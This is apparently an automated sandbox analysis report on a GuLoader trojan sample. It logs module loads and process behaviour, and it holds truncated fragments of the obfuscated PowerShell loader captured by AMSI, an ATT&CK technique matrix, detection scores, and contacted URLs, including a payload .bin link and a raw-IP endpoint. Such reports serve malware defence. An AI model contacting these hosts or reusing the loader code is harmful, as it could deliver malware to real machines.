Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: crtdll.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winrnr.dll	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((prestigens $Protagon $deponentes), (Koners @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Recenserecit = [AppDomain]::CurrentDomain.GetAssemblies()$global
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Detektorens)), $Vejsvingene).DefineDynamicModule($intraperiosteal, $false).DefineType($polenkas, $Finansieringsformen, [System.Multica

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0410A4AA pushfd ; ret	3_2_0410A4B9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0410E9F8 push eax; mov dword ptr [esp], edx	3_2_0410EA0C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_06F90FC4 push es; iretd	3_2_06F90FC7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_06F9F2C8 push 3007EC69h; ret	3_2_06F9F2E5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_06F9F3E8 pushfd ; ret	3_2_06F9F745

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6508			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3097			Jump to behavior

Source: ModuleAnalysisCache.3.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.1786216899.0000000004D5D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.1786216899.0000000004D5D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\
Source: powershell.exe, 00000003.00000002.1786216899.0000000004D5D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\
Source: msiexec.exe, 0000000C.00000002.1975516946.00000000073CA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.1975516946.00000000073FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	API call chain: ExitProcess graph end node			graph_0-3005
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	API call chain: ExitProcess graph end node			graph_0-3160

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Source	Detection	Scanner	Label	Link
KWbWCYe6LB.exe	65%	Virustotal		Browse
KWbWCYe6LB.exe	50%	ReversingLabs	Win32.Trojan.Guloader

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Smutches\KWbWCYe6LB.exe	50%	ReversingLabs	Win32.Trojan.Guloader
C:\Users\user\AppData\Local\Temp\nsmCD.tmp\nsExec.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://ganpatmasala.nl/1	0%	Avira URL Cloud	safe
https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.bin7oj	0%	Avira URL Cloud	safe
https://ganpatmasala.nl/q	0%	Avira URL Cloud	safe
https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.binO	0%	Avira URL Cloud	safe
http://79.110.49.155/cyb1/index.php	0%	Avira URL Cloud	safe
https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.bin	0%	Avira URL Cloud	safe
